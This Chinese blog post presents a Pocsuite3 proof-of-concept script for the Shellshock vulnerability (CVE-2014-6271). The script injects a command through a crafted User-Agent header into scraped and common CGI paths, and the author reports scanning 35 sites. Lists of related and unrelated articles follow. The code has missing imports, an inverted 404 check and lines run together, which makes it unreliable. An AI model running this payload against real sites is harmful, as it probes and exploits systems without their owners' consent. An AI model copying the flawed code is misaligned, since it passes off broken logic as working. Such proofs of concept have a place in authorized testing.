前言

编写破壳CVE-2014-6271_Shellshock的POC,把公开出来的路径封装起来,作为Pocsuite3的验证POC

情况1:网站无法访问,返回失败

情况2:网站可以访问,无漏洞

情况3:网站可以访问,有漏洞

优先获取网站本身的cgi路径,如果没有,就用自带的cgi路径测试。

代码

15分钟,35个站点

#!/usr/bin/env python
# coding: utf-8
from pocsuite3.api import Output, POCBase, POC_CATEGORY, register_poc, requests, logger
import random
import string
import re dict = ["/cgi-bin/load.cgi",
"/cgi-bin/gsweb.cgi",
"/cgi-bin/redirector.cgi",
"/cgi-bin/help.cgi",
"/cgi-bin/about.cgi",
"/cgi-bin/vidredirect.cgi",
"/cgi-bin/click.cgi",
"/cgi-bin/details.cgi",
"/cgi-bin/log.cgi",
"/cgi-bin/viewcontent.cgi",
"/cgi-bin/content.cgi",
"/cgi-bin/admin.cgi",
"/cgi-bin/webmail.cgi",
"/cgi-bin/authLogin.cgi",
"/cgi-sys/entropysearch.cgi",
"/cgi-sys/defaultwebpage.cgi",
"/cgi-mod/index.cgi",
"/cgi-bin/poc.cgi",
"/cgi-bin/test.cgi",
"/cgi-mod/index.cgi"
] class DemoPOC(POCBase):
vulID = '0'
version = '1'
author = 'shenyi'
vulDate = '2014-10-16'
createDate = '2014-10-16'
updateDate = '2014-10-16'
references = ['https://www.invisiblethreat.ca/2014/09/cve-2014-6271/']
name = 'Bash 4.3 远程命令执行漏洞 POC'
appPowerLink = 'http://www.gnu.org/software/bash/'
appName = 'Bash'
appVersion = '3.0-4.3#'
vulType = 'Command Execution'
desc = '''
Bash 在解析环境变量时,会解析函数,同时可以运行函数后的语句,造成命令执行。
'''
samples = []
install_requires = [] def _verify(self):
result = {}
vul_url_result = "" # 存放漏洞结果的URL
try:
vul_url = get_url_need(self.url) if not vul_url: # 网站不存活状态,直接返回
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = vul_url_result
return self.parse_output(result)
elif vul_url.endswith("/123456_test.cgi"): # 未获取网页中的cgi链接状态
pass
else: # 获取.cgi、.sh链接
dict.insert(0,vul_url)
random_str = ''.join(random.sample(string.ascii_letters + string.digits, 50))
headers_fake = {}
headers_fake['User-Agent'] = '() { :; }; echo; echo X-Bash-Test: %s' % random_str
for url_path in dict:
try:
test_url = self.url + url_path
# response = requests.get(vul_url, headers=headers_fake)
response = requests.get(test_url, headers=headers_fake)
response = response.text
if 'X-Bash-Test: %s' % random_str == response.split('\n')[0]:
vul_url_result = test_url
except:
pass
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = vul_url_result
except Exception as e:
logger.exception(e)
return self.parse_output(result) def parse_output(self, result):
output = Output(self)
if result['VerifyInfo']['URL']:
output.success(result)
else:
output.fail('target is not vulnerable')
return output def _attack(self):
return self._verify() def _shell(self):
pass def get_url(url):
try:
return requests.get(url).url
except:
return url def get_url_need(url):
url_need = None if not url.startswith('http'):
url = 'http://%s' % url
# 判断字符串是否以指定后缀结尾,如果以指定后缀结尾返回True,否则返回False。
if url.endswith('.cgi') or url.endswith('.sh'):
url_need = url
return url_need
# 验证HTTP有效性
try:
url = requests.get(url,timeout=10).url
except:
print("error : {}".format(url)) # 出错直接返回
return ""
# 获取主页连接
url_need = get_link(url)
# 如果没有获取到链接就使用自定义的CGI路径测试
if not url_need:
url_need = url + "/123456_test.cgi" info = url_need
# print info
return info def get_link(url):
rnt = ''
try:
page_content = requests.get(url).text
match = re.findall(r'''(?:href|action|src)\s*?=\s*?(?:"|')\s*?([^'"]*?\.(?:cgi|sh|pl))''', page_content)
for item_url in match:
if not item_url.startswith('http'):
item_url = getAbsoluteURL(url, item_url)
if not is_url_exist(item_url):
continue
if isSameDomain(item_url, url):
rnt = item_url
break
return rnt
except Exception as e:
# raise e
return rnt def getAbsoluteURL(base, url):
url1 = urljoin(base, url)
arr = urlparse(url1)
path = normpath(arr[2])
return urlunparse((arr.scheme, arr.netloc, path, arr.params, arr.query, arr.fragment)) def is_url_exist(url):
try:
resp = requests.get(url)
if resp.status_code == 404:
return True
except Exception as e:
pass
return False def isSameDomain(url1, url2):
try:
if urlparse(url1).netloc.split(':')[0] == urlparse(url2).netloc.split(':')[0]:
return True
else:
return False
except:
return False register_poc(DemoPOC)

Pocsuite3--编写破壳CVE-2014-6271_Shellshock的POC的更多相关文章

  1. 编写POC时候的几个参考项目

    0x01. 背景 在编写pocsuite时候,会查阅大量的文件,poc利用方式. ​ 1. pocsuite是什么 Pocsuite 是由知道创宇404实验室打造的一款开源的远程漏洞测试框架.它是知道 ...

  2. Shellshock 破壳漏洞 Writeup

    破壳漏洞 CVE编号:CVE-2014-6271 题目URL:http://www.whalwl.site:8029/ 提示:flag在服务器根目录 ShellShock (CVE-2014-6271 ...

  3. php大力力 [016节] 兄弟连高洛峰php教程(2014年 14章数据库章节列表)

    2015-08-25 php大力力016 兄弟连高洛峰php教程(2014年 14章数据库章节列表) [2014]兄弟连高洛峰 PHP教程14.1.1 复习数据库  15:58 [2014]兄弟连高洛 ...

  4. Android安全研究经验谈

    安全研究做什么 从攻击角度举例,可以是:对某个模块进行漏洞挖掘的方法,对某个漏洞进行利用的技术,通过逆向工程破解程序.解密数据,对系统或应用进行感染.劫持等破坏安全性的攻击技术等. 而防御上则是:查杀 ...

  5. Bash漏洞批量检测工具与修复方案

    <img src="http://image.3001.net/images/20140928/14118931103311.jpg!small" t ...

  6. PJzhang:国内常用威胁情报搜索引擎说明

    猫宁!!! 参考链接: https://www.freebuf.com/column/136763.html https://www.freebuf.com/sectool/163946.html 如 ...

  7. php大力力 [019节]php分页类的学习

    2015-08-26 php大力力019.php分页类的学习 [2014]兄弟连高洛峰 PHP教程14.2.1 分页需求分析 14:18 [2014]兄弟连高洛峰 PHP教程14.2.2 分页类中分页 ...

  8. php大力力 [015节]兄弟连高洛峰php教程(土豆网栏目地址)

    兄弟连高洛峰php教程 兄弟连高洛峰php教程(土豆网栏目地址) [2014]兄弟连高洛峰 PHP教程1.1.1 新版视频形式介绍 [2014]兄弟连高洛峰 PHP教程1.1.2 BS结构软件类型介绍 ...

  9. [AaronYang]C#人爱学不学[1]

    当前编写时间:2014年12月24日21:11:14   编写人:杨洋(Aaronyang) 新文章:[AaronYang]C#人爱学不学[1] 声明:->可以理解为 联想到,或者关联的意思. ...

随机推荐

  1. bcb ole拖拽功能的实现

    最近项目中用到了OLE 拖拽功能 和BCB 一个Form的Drag 不同的是,只有实现了OLE 拖拽才能,从其他程序拖拽数据到Form 下面的代码实现了,同HTML网页拖拽到Form时,Form获得H ...

  2. window程序意外关闭自动重启脚本实现

    @echo off : tasklist|find /i "xxxx"||start yyyy ping/n 127.1>nul 新建 .bat 文件,将其写入文件 xxxx ...

  3. Java并发包--ArrayBlockingQueue

    转载请注明出处:http://www.cnblogs.com/skywang12345/p/3498652.html ArrayBlockingQueue介绍 ArrayBlockingQueue是数 ...

  4. airflow--调度研究

    1.从调度到airflow ETL,是英文 Extract,Transform,Load 的缩写,用来描述将数据从来源端经过抽取(extract).转换(transform).加载(load)至目的端 ...

  5. MySQL中的连接、实例、会话、数据库、线程之间的关系

    MySQL中的实例.数据库关系简介 1.MySQL是单进程多线程(而Oracle等是多进程),也就是说MySQL实例在系 统上表现就是一个服务进程,即进程(通过多种方法可以创建多实例,再安装一个端口号 ...

  6. 3、python--第三天练习题

    #1.简述普通参数.指定参数.默认参数.动态参数的区别 #1.普通参数就是传入的函数,没有默认值 def f(a): a = a + 1 return a print(f(3)) #2.指定参数 de ...

  7. SIGAI深度学习第三集 人工神经网络2

    讲授神经网络的理论解释.实现细节包括输入与输出值的设定.网络规模.激活函数.损失函数.初始化.正则化.学习率的设定.实际应用等 大纲: 实验环节: 理论层面的解释:两个方面,1.数学角度,映射函数h( ...

  8. 五十四.自定义镜像及仓库、持久化存储 、 Docker网络架构

    1. 制作自定义镜像(base基础镜像,搭建共性环境) 基于centos镜像使用commit创建新的镜像文件 基于centos镜像使用Dockerfile文件创建一个新的镜像文件   1.1 使用镜像 ...

  9. java文件实现文件的上传和下载

    文件上传是最古老的互联网操作之一,20多年来几乎没有怎么变化,还是操作麻烦.缺乏交互.用户体验差. 一.前端代码 英国程序员Remy Sharp总结了这些新的接口 ,本文在他的基础之上,讨论在前端采用 ...

  10. 通过zabbix来监控树莓派

    安装zabbix-agent(4.0版本) 配置zabbix-agent(使用主动模式) 使用zabbix-sender(主动推送自定义数据) 以下 执行命令和相关配置文件: wget https:/ ...